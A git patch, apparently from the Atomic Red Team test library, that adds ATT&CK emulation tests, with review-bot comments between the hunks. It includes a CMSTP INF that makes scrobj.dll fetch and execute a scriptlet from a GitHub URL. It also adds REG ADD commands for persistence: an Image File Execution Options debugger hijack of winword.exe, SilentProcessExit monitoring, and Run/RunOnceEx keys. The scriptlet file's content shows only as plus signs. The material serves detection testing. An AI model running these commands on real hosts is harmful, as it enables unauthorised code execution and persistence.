From 92ab19d77301b618eaf886a1185ea63b95b4bf8e Mon Sep 17 00:00:00 2001
From: api0cradle
Date: Tue, 17 Apr 2018 11:58:38 +0200
Subject: [PATCH] Created T1191 and T1183, added technique to T1060

---
 Windows/Execution/CMSTP.md | 14 +++++++++++
 Windows/Payloads/CMSTP.inf | 16 +++++++++++++
 Windows/Payloads/CMSTP.sct | 23 +++++++++++++++++++
 .../Image_File_Execution_Options_Injection.md | 15 ++++++++++++
 .../Registry_Run_Keys_Start_Folder.md | 5 +++-
 5 files changed, 72 insertions(+), 1 deletion(-)
 create mode 100644 Windows/Execution/CMSTP.md
 create mode 100644 Windows/Payloads/CMSTP.inf
 create mode 100644 Windows/Payloads/CMSTP.sct
 create mode 100644 Windows/Persistence/Image_File_Execution_Options_Injection.md

diff --git a/Windows/Execution/CMSTP.md b/Windows/Execution/CMSTP.md
new file mode 100644
index 00000000..67a3035a
--- /dev/null
+++ b/Windows/Execution/CMSTP.md
@@ -0,0 +1,14 @@
+## CMSTP
+
+MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191)
+
+### Scriptlet execution
+
+ cmstp.exe /s CMSTP.inf
+
+## Test Script
+
+[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf)
+[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct)
+
+
diff --git a/Windows/Payloads/CMSTP.inf b/Windows/Payloads/CMSTP.inf
new file mode 100644
index 00000000..d0012c86
--- /dev/null
+++ b/Windows/Payloads/CMSTP.inf
@@ -0,0 +1,16 @@
+; Author: @NickTyrer - https://twitter.com/NickTyrer/status/958450014111633408
+
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/CMSTP.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"
\ No newline at end of file
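Review bot: The `[UnRegisterOCXSection]` entry in CMSTP.inf has scrobj.dll load the scriptlet from `https://raw.githubusercontent.com/.../master/Windows/Payloads/CMSTP.sct` at run time, so the test needs outbound HTTPS from the host and executes whatever is on `master` at that moment rather than the CMSTP.sct committed alongside it. For a reproducible atomic, point that line at a local copy of the payload (the same path CMSTP.md would tell the operator to stage it at) or state the network dependency in CMSTP.md next to `cmstp.exe /s CMSTP.inf`. A header comment in the INF such as `; Requires network egress: scrobj.dll fetches the .sct from the URL in [UnRegisterOCXSection]` would make that visible to whoever runs it.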
diff --git a/Windows/Payloads/CMSTP.sct b/Windows/Payloads/CMSTP.sct
new file mode 100644
index 00000000..697938ed
--- /dev/null
+++ b/Windows/Payloads/CMSTP.sct
@@ -0,0 +1,23 @@ + + + + + + + + + + + + + +
diff --git a/Windows/Persistence/Image_File_Execution_Options_Injection.md b/Windows/Persistence/Image_File_Execution_Options_Injection.md
new file mode 100644
index 00000000..72fc2d41
--- /dev/null
+++ b/Windows/Persistence/Image_File_Execution_Options_Injection.md
@@ -0,0 +1,15 @@
+# Image File Execution Options
+
+MITRE ATT&CK Technique: [T1183](https://attack.mitre.org/wiki/Technique/T1183)
+
+## Debugger
+
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe"
+
+
+## GlobalFlags
+
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe"
+
diff --git a/Windows/Persistence/Registry_Run_Keys_Start_Folder.md b/Windows/Persistence/Registry_Run_Keys_Start_Folder.md
index a1d415ec..6c99dc4b 100644
--- a/Windows/Persistence/Registry_Run_Keys_Start_Folder.md
+++ b/Windows/Persistence/Registry_Run_Keys_Start_Folder.md
@@ -2,11 +2,14 @@
 MITRE ATT&CK Technique: [T1060](https://attack.mitre.org/wiki/Technique/T1060)
-## Reg Add
+## Reg Add 1
 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
+## Reg Add 2
+
+ REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
 ## PowerShell
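Review bot: None of the four `REG ADD` commands in Image_File_Execution_Options_Injection.md passes `/f`, so on a host where the value already exists (a second run of the test) reg.exe stops at its `overwrite (Yes/No)?` prompt and an unattended run stalls; the Run-key test in Registry_Run_Keys_Start_Folder.md already uses `/F`, so adding `/f` here keeps the two consistent. The `Debugger` entry under `## Debugger` is also not paired with a cleanup step, and while it is present every launch of winword.exe is redirected to `C:\folder\AtomicRedTeam.exe`; a matching `REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /f` (and equivalent deletes for the GlobalFlag and SilentProcessExit values) would let the operator revert the host. A one-line note that `512` is `0x200` (the documented FLG_MONITOR_SILENT_PROCESS_EXIT flag) would help readers connect the GlobalFlag value to the two SilentProcessExit entries that follow it.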